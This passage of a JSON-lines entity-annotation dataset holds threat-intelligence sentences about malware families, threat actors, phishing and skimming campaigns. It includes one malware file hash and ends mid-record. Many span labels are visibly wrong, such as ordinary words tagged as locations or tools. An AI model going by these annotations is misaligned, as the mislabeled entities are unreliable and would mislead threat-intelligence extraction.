:"IPV4","start_offset":601,"end_offset":615},{"id":30315,"label":"IPV4","start_offset":632,"end_offset":646}],"relations":[],"Comments":[]} {"id":166,"text":"Extra layers of protection for those files would be incredibly onerous.","entities":[],"relations":[],"Comments":[]} {"id":8041,"text":"When they did, attackers sent them phishing links in follow-on correspondence.","entities":[{"id":24947,"label":"location","start_offset":30,"end_offset":34},{"id":24948,"label":"attack-pattern","start_offset":35,"end_offset":43}],"relations":[],"Comments":[]} {"id":1479,"text":"In addition to our research, the Baidu Security team in China recently found 23 mobile banking apps sharing the same certificate hosted by a third party app developer and reported the discovery to the CNCERT in China.","entities":[{"id":45023,"label":"location","start_offset":56,"end_offset":61},{"id":45025,"label":"location","start_offset":211,"end_offset":216},{"id":45026,"label":"identity","start_offset":201,"end_offset":207},{"id":45024,"label":"identity","start_offset":33,"end_offset":52}],"relations":[{"id":58,"from_id":45026,"to_id":45025,"type":"located-at"},{"id":219,"from_id":45024,"to_id":45023,"type":"located-at"}],"Comments":[]} {"id":13956,"text":"Organizations therefore need to take the time to put in place an incident response plan focused on the new model of ransomware attacks.","entities":[],"relations":[],"Comments":[]} {"id":10779,"text":"Due to the suspicious nature of this activity, we decided to investigate further.","entities":[],"relations":[],"Comments":[]} {"id":13532,"text":"King added that this DOE initiative will better protect the US from cyberattacks.","entities":[{"id":51595,"label":"identity","start_offset":0,"end_offset":4},{"id":51596,"label":"location","start_offset":60,"end_offset":62}],"relations":[],"Comments":[]} {"id":3862,"text":"If the user clicks on the \u201cNo\u201d button, malicious activity will not initiate.","entities":[],"relations":[],"Comments":[]} {"id":924,"text":"Ransom demand ","entities":[],"relations":[],"Comments":[]} {"id":3654,"text":"And so technological prevention controls (patching, robust security) are even more for effective prevention.","entities":[],"relations":[],"Comments":[]} {"id":2285,"text":"Parallel to the analysis, tracking, and technical disruption of this botnet, Google has filed a lawsuit against two individuals believed to be located in Russia for operating the Glupteba Botnet and its various criminal schemes.","entities":[{"id":47357,"label":"identity","start_offset":77,"end_offset":83},{"id":47356,"label":"malware","start_offset":179,"end_offset":187},{"id":47358,"label":"location","start_offset":154,"end_offset":160}],"relations":[{"id":314,"from_id":47356,"to_id":47358,"type":"located-at"}],"Comments":[]} {"id":3254,"text":"The BPS backdoor global configuration variable The backdoor communicates with the C&C server using the Socket.io protocol.","entities":[{"id":48370,"label":"malware","start_offset":4,"end_offset":16}],"relations":[],"Comments":[]} {"id":932,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":8512,"text":"The actors behind this campaign, which we attribute to a group of hackers recruited in a Russian-speaking forum, lure their target with fake collaboration opportunities (typically a demo for anti-virus software, VPN, music players, photo editing or online games), hijack their channel, then either sell it to the highest bidder or use it to broadcast cryptocurrency scams.","entities":[{"id":26277,"label":"location","start_offset":23,"end_offset":31},{"id":26279,"label":"location","start_offset":113,"end_offset":117},{"id":26280,"label":"location","start_offset":124,"end_offset":130},{"id":26281,"label":"tools","start_offset":232,"end_offset":237}],"relations":[],"Comments":[]} {"id":14138,"text":"However, the SYSTEM_ADMIN account has a different pattern because the actions are mostly due to manual administration activities.","entities":[],"relations":[],"Comments":[]} {"id":2262,"text":"Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":3364,"text":".Python.BIOPASS.A 30ccfbf24b7c8cc15f85541d5ec18feb0e19e75e1e4d2bca9941e6585dad7bc7 cdaemon.txt BIOPASS RAT Python Script (Cdaemon module) Trojan","entities":[{"id":10180,"label":"malware","start_offset":98,"end_offset":109},{"id":10179,"label":"SHA2","start_offset":19,"end_offset":83},{"id":48981,"label":"malware","start_offset":1,"end_offset":17},{"id":48982,"label":"FILEPATH","start_offset":85,"end_offset":96}],"relations":[{"id":538,"from_id":48982,"to_id":10179,"type":"duplicate-of"},{"id":539,"from_id":10179,"to_id":10180,"type":"indicates"},{"id":540,"from_id":48982,"to_id":10180,"type":"indicates"},{"id":541,"from_id":48981,"to_id":10180,"type":"duplicate-of"}],"Comments":[]} {"id":3989,"text":"The three most common methods are taking over the software update mechanism to deliver an updated software with malicious code, exploiting misconfigured access controls, and targeting publicly accessible code libraries, and inserting malicious code, which unknowing customers then download to their systems.","entities":[],"relations":[],"Comments":[]} {"id":1571,"text":"The Ukrainian CERT has issued an alert on Bad Rabbit.","entities":[{"id":4696,"label":"malware","start_offset":42,"end_offset":52},{"id":46828,"label":"identity","start_offset":4,"end_offset":18}],"relations":[],"Comments":[]} {"id":13752,"text":"The image on the right showcases how the DLL on a victim's machine appears.","entities":[],"relations":[],"Comments":[]} {"id":9296,"text":"Unlike many web skimmers, which are designed to collect information from many kinds of e-commerce payment pages in general, the skimmer that the Mirrorthief group used was designed specifically for PrismWeb\u2019s payment page.","entities":[{"id":28712,"label":"location","start_offset":7,"end_offset":11},{"id":28713,"label":"location","start_offset":32,"end_offset":35},{"id":28714,"label":"location","start_offset":73,"end_offset":77},{"id":28715,"label":"location","start_offset":89,"end_offset":97},{"id":28718,"label":"tools","start_offset":217,"end_offset":221}],"relations":[],"Comments":[]} {"id":5177,"text":"We also show a preview of the security gaps we found in the standard\u2019s specification and a summary of our testing procedure.","entities":[],"relations":[],"Comments":[]} {"id":9700,"text":"Encoding the encryption key","entities":[],"relations":[],"Comments":[]} {"id":1024,"text":" To further assess this threat, we purchased a customized, new account from a seller on Taobao.","entities":[{"id":46515,"label":"SOFTWARE","start_offset":88,"end_offset":94}],"relations":[],"Comments":[]} {"id":1422,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":5329,"text":"After choosing an IP address and a TCP port pair, the core component creates a child process to perform the communication.","entities":[],"relations":[],"Comments":[]} {"id":3872,"text":"Thus, there is a pressing need to detect and address threats via a proactive incident response strategy.","entities":[],"relations":[],"Comments":[]} {"id":3272,"text":"The BIOPASS RAT malware implements multiple commands, most of which are self-explanatory.","entities":[{"id":9936,"label":"malware","start_offset":4,"end_offset":15}],"relations":[],"Comments":[]} {"id":4400,"text":"Once provided, the data in the \"Identity\" field is sent to a C2 for confirmation.","entities":[],"relations":[],"Comments":[]} {"id":3179,"text":" We also found several clues that show how the malware might be connected with the Winnti Group(also known as APT41). ","entities":[{"id":48308,"label":"threat-actor","start_offset":110,"end_offset":115},{"id":48307,"label":"threat-actor","start_offset":83,"end_offset":95}],"relations":[{"id":403,"from_id":48307,"to_id":48308,"type":"duplicate-of"}],"Comments":[]} {"id":317,"text":"The key is putting a policy in place and making sure your technology is enforcing that policy at the network layer.","entities":[],"relations":[],"Comments":[]} {"id":2431,"text":"However, while the original way of obtaining the class loader and exploiting it no longer works, a new feature of JDK was introduced in version 9, providing another way to obtain the class loader and making the exploit possible again.","entities":[{"id":47499,"label":"SOFTWARE","start_offset":114,"end_offset":117}],"relations":[],"Comments":[]} {"id":8136,"text":"The app callCam hides its icon on the device after being launched.","entities":[],"relations":[],"Comments":[]} {"id":775,"text":"Finally we make the size of the CMemoryProtector::ProtectedFree management structure larger than 0x186a0 forcing the freeing operation.","entities":[],"relations":[],"Comments":[]} {"id":1583,"text":" Once inside a network, Bad Rabbit propagates itself to other systems.","entities":[{"id":4721,"label":"malware","start_offset":24,"end_offset":34}],"relations":[],"Comments":[]} {"id":7991,"text":"Once the target agreed to the deal, a malware landing page disguised as a software download URL was sent via email or a PDF on Google Drive, and in a few cases, Google documents containing the phishing links.","entities":[{"id":24771,"label":"location","start_offset":9,"end_offset":15},{"id":24772,"label":"location","start_offset":30,"end_offset":34},{"id":24773,"label":"location","start_offset":46,"end_offset":53},{"id":24774,"label":"location","start_offset":54,"end_offset":58},{"id":24776,"label":"location","start_offset":141,"end_offset":144},{"id":24778,"label":"attack-pattern","start_offset":193,"end_offset":201}],"relations":[],"Comments":[]} {"id":1112,"text":" In cases such as these the common approach is to use sets of the data, in this case sets of mutexes, to create fingerprints of each sample and then leverage those fingerprints to extract higher confidence classification decisions.","entities":[],"relations":[],"Comments":[]} {"id":13266,"text":"Figure 6.","entities":[],"relations":[],"Comments":[]} {"id":3904,"text":"To learn more about how to protect smart factories and their critical operations, read Trend Micro's expertly crafted best practices and solutions: Smart Factory Security Solutions Trend Micro Best Practices for Securing Smart Factories Tags Latest News | ICS OT | APT & Targeted Attacks | Ransomware | Articles, News, Reports | Cyber Threats","entities":[{"id":49754,"label":"identity","start_offset":87,"end_offset":98}],"relations":[],"Comments":[]} {"id":314,"text":" Once you can identify the traffic, you need to separate the good from the bad.","entities":[],"relations":[],"Comments":[]} {"id":3175,"text":" We consider BIOPASS RAT as still being actively developed.","entities":[{"id":48301,"label":"malware","start_offset":13,"end_offset":24}],"relations":[],"Comments":[]} {"id":13791,"text":"In order to hide the behaviors of the first-stage backdoor (which is the second payload), the first payload uses API hooking techniques to avoid being detected by a specific security product and to make an interference in the result of the function execution.","entities":[{"id":42815,"label":"attack-pattern","start_offset":117,"end_offset":124},{"id":42816,"label":"location","start_offset":174,"end_offset":182},{"id":42817,"label":"location","start_offset":191,"end_offset":194}],"relations":[],"Comments":[]} {"id":5784,"text":"Jon:","entities":[],"relations":[],"Comments":[]} {"id":3972,"text":" Enterprises and organizations should have comprehensive and efficient protection, detection, prevention, and remediation based on real-time, higher-confidence alerts to protect critical data and operations from sophisticated attacks and threats.","entities":[],"relations":[],"Comments":[]} {"id":5470,"text":"Exploiting the human psyche with chat apps Probing Confucius\u2019 infrastructure, we came across websites offering Windows and Android chat applications, most likely iterations of its predecessor, Simple Chat Point: Secret Chat Point, and Tweety Chat.","entities":[{"id":51460,"label":"SOFTWARE","start_offset":123,"end_offset":130},{"id":51461,"label":"SOFTWARE","start_offset":193,"end_offset":210},{"id":51458,"label":"threat-actor","start_offset":51,"end_offset":60},{"id":51459,"label":"SOFTWARE","start_offset":111,"end_offset":118},{"id":51462,"label":"SOFTWARE","start_offset":212,"end_offset":229},{"id":51463,"label":"SOFTWARE","start_offset":235,"end_offset":246}],"relations":[],"Comments":[]} {"id":1279,"text":"Additionally, the actors have now added the popular PlugX backdoor to their toolkit.","entities":[{"id":46653,"label":"malware","start_offset":52,"end_offset":66}],"relations":[],"Comments":[]} {"id":13004,"text":"In mid-April, TAG detected a Ghostwriter credential phishing campaign targeting Facebook users.","entities":[{"id":48806,"label":"threat-actor","start_offset":29,"end_offset":41},{"id":48802,"label":"attack-pattern","start_offset":52,"end_offset":61},{"id":48803,"label":"SOFTWARE","start_offset":80,"end_offset":89}],"relations":[],"Comments":[]} {"id":5369,"text":"Asus module main loop If the data coming from the core component starts with \u201c c:\\programdata\\\\.bat \/sc \/once \/st